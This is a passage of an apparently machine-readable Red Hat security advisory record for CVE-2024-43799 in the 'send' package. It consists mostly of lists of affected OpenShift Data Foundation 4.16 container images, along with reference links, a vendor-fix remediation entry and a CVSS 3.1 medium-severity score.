"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", 